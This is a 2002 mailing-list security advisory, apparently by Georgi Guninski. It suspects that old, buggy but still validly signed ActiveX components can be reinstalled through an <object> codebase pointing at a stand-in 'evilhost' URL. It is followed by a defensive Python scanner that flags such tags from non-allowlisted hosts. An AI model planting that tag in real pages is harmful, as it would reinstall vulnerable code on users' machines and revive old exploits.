Digitally signing buggy ActiveX components
Giovanni Coppa
giannicoppa@yahoo.it
Thu 14 Feb 2002 19:26:45 CET
> Digitally signing buggy ActiveX components
>
> Date: 14 February 2002
>
> Disclaimer:
>
> This is just an unverified suspicion. I don't claim
> this information is true.
>
> The opinions expressed in this advisory and program
> are my own and
> not of any company. The usual standard disclaimer
> applies,
> especially the fact that Georgi Guninski is not
> liable for any damages
> caused by direct or indirect use of the information
> or functionality
> provided by this advisory or program. Georgi
> Guninski bears no
> responsibility for content or misuse of this
> advisory or program or
> any derivatives thereof.
>
> Description:
>
> Back in 1999 Juan Carlos Garcia Cuartango
> <cuartangojc@MX3.REDESTB.ES> made an
> excellent point at:
>
> http://archives.neohapsis.com/archives/ntbugtraq/1998-1999/msg00422.html
> -------------------
> 3- Even if Microsoft fixes the hole the hole could
> exist forever. Why ?
> As far as I know this is the first time a hole is
> "SIGNED".
> MS has released a "dhtmed.cab" file as an ActiveX
> component signed by Microsoft
> -------------------
>
> Here is more on this.
>
> ActiveX in internet explorer allows downloading from
> the web and installing
> signed components (native code) on the user
> computer.
>
> As history shows, a lot of ActiveX components are
> buggy and a new version is
> released. The interesting part is the buggy version
> is still really signed and
> available in one form or another.
>
> A pure hypothetical scenario is to try to install
> the old buggy signed version
> if the user doesn't have it or on top of the patched
> one.
> Basically this is done this way:
> --------------------
> <object
> codebase="http://evilhost/buggyreallysigned.file"
> classid="clsid:speciallycrafted">
> </object>
> --------------------
> So, I wonder whether doing such mischief may lead to
> old exploits start
> working?
>
> Workaround/Solution:
> Don't know whether this is a real threat, this is
> just a suspicion.
> Anyway, to prevent such stuff, in internet explorer
> security options
> disable everything that contains "active".
> Or at least if you see a prompt "...This is
> digitally signed by X..."
> think do you really trust X having in mind his
> security record.
>
> Regards,
> Georgi Guninski
> http://www.guninski.com
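
An added example, not part of the advisory or of the forwarded message: a content-filter style check, in Python, that lists every `<object>` tag able to trigger a component download and marks those whose `codebase` host is not on an allowlist. The allowlist host, the sample page and all function names are assumptions constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: hosts this organisation accepts component downloads from.
ALLOWED_CODEBASE_HOSTS = {"intranet.example"}

class ObjectCodebaseFinder(HTMLParser):
    """Collect <object> tags that carry a codebase (download location)."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lower-cases tag and attribute names for us.
        if tag != "object":
            return
        a = {k: (v or "").strip() for k, v in attrs}
        codebase = a.get("codebase", "")
        if not codebase:
            return  # no download location on this tag
        url = urlparse(codebase)
        host = (url.hostname or "").lower()
        frag = url.fragment
        # "#Version=a,b,c,d" names the component version the page asks for.
        version = frag[8:] if frag.lower().startswith("version=") else None
        self.findings.append({
            "line": self.getpos()[0],
            "classid": a.get("classid", ""),
            "codebase": codebase,
            "host": host,
            "version": version,
            # Fail closed: relative or host-less codebases are not allowed.
            "allowed": host in ALLOWED_CODEBASE_HOSTS,
        })

def scan_html(html):
    finder = ObjectCodebaseFinder()
    finder.feed(html)
    finder.close()
    return finder.findings

# Constructed sample page; the first tag is the snippet from the advisory.
SAMPLE = """
<html><body>
<object codebase="http://evilhost/buggyreallysigned.file"
 classid="clsid:speciallycrafted">
</object>
<OBJECT CLASSID="clsid:00000000-0000-0000-0000-000000000000"
 CODEBASE="https://intranet.example/ctl.cab#Version=1,0,0,2"></OBJECT>
<object data="movie.swf"></object>
</body></html>
"""
```

The signature on the downloaded file plays no part in this check; it only reports where a page asks the browser to fetch a component from, which is the decision the advisory says the signature prompt does not cover.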